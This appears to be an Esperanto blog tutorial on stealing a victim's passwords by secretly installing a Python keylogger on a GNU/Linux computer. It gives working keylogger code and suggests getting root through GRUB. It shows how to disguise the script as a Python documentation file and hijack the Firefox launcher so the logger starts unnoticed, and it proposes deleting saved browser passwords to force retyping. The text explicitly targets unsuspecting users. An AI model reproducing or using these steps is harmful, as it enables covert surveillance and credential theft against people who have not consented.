Simpla maniero ŝteli pasvortojn estas instali klavaroregistrilon (keylogger) en la komputilo de nia viktimo. Mi montros kiel fari tion en GNU/Linukso per la Python-programlingvo.
Unue ni devas akiri permesojn de ĉefuzanto. Se la komputilo estas administrita de ni, ni jam scias la pasvorton. Se tio ne estas nia okazo, ni povas akiri aliron de ĉefuzanto per GRUB. Per la necesaj permesoj ni jam povas instali la klavaroregistrilon.
Unue, oni devas instali la pynput
-bibliotekon per...
sudo pip install pynput
Sekve ni devas skribi la klavaroregistrilon. Jen la kodo, kiun ni uzos:
#!/usr/bin/env python3
from pynput.keyboard import Key, Listener
import logging
log_dir = "/usr/share/doc/python3/"
logging.basicConfig(filename=(log_dir + "log"), \
level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
La klavaroregistrilo konserviĝas en log_dir
. Mi, ĉi-okaze, specifis la
dokumentaran dosieron de Python 3 en GNU/Linukso. Ni ankaŭ povas
konservi la klavaroregistrilon en tiun dosierujon, eble uzante la nomon
compile_docs.py
aŭ iun similan, por ne altiri la atenton.
Plej bone estas elekti dosierujon, kiun la viktimo ne eniros, por eviti,
ke ri ne rimarku tion, kion ni faras.
Fine ni devus plenumi la programon ĉiam, kiam oni ŝaltu la komputilon aŭ
programo estu plenumita, sen ke la viktimo rimarku. Se, ekzemple, ni
volas startigi la klavaroregistrilon ĉiam, kiam la uzanto malfermu
Firefox-on, ni povas modifi la Firefox-komandon. Ni povas alinomi
firefox
1 al firefox.bin
kaj krei la jenan dosieron nomitan
firefox
.
python3 /usr/share/doc/python3/compile_docs.py &
exec firefox.bin "$@"
Por scii kiu firefox
-dosiero estas plenumita, kiam ni premas ĝian
bildeton, ni devas iri al
/usr/share/applications
, eniri la dosieron firefox.desktop
(aŭ
firefox-esr.desktop
) kaj serĉi la linion, kiu komenciĝas per Exec
.
Sekve ni devus doni al ĝi skribpermesojn por aliaj uzantoj malsamaj ol
root
al la dosierujo, kie ni konservos la klavaroregistrilon:
sudo chmod o+w /usr/share/doc/python3
Finfine ni devus atendi ĝis la viktimo uzu la komputilo por atingi riajn
pasvortojn aŭ ĉian ajn informon, kiun ri tajpu, kiun ni volas akiri. La
registroj de klavoj estos konservita en la dosiero
/usr/share/doc/python3/log
. Sed estu singarda: la dosiero povus preni
multe da spaco, se vi ne forigas ĝin de tempo al tempo; do plej bone
estus malinstali la klavaroregistrilon post la akiro de la informoj,
kiujn vi bezonas. Alia opcio estas agordi ĝin, por ke ĝi sendu la
informon de tajpado per retpoŝto anstataŭ konservi ĝin en dosieron. Tiel
ĝi ne prenus multe da spaco en la viktimula komputilo; sed tiu metodo
postulas, ke ni uzu retadreson2.
Se la viktimo havas la pasvortojn konservitajn en la retumilo kaj ne
bezonas skribi ilin denove, ni povas forigi la dosieron de pasvortoj,
por ke ĝi estu devigita enigi ilin denove. Resume, ni povas ruze akiri
multe da informo, speciale se ni uzas ĉi tiun metodon kontraŭ
amatoraj uzantoj, kiuj ne multe suspektos. Por progresintaj uzantoj eble
plej bonas kompili la compile_docs.py
-programon per
Nuitka, kiel mi montras en la sekva
artikolo.
Komentoj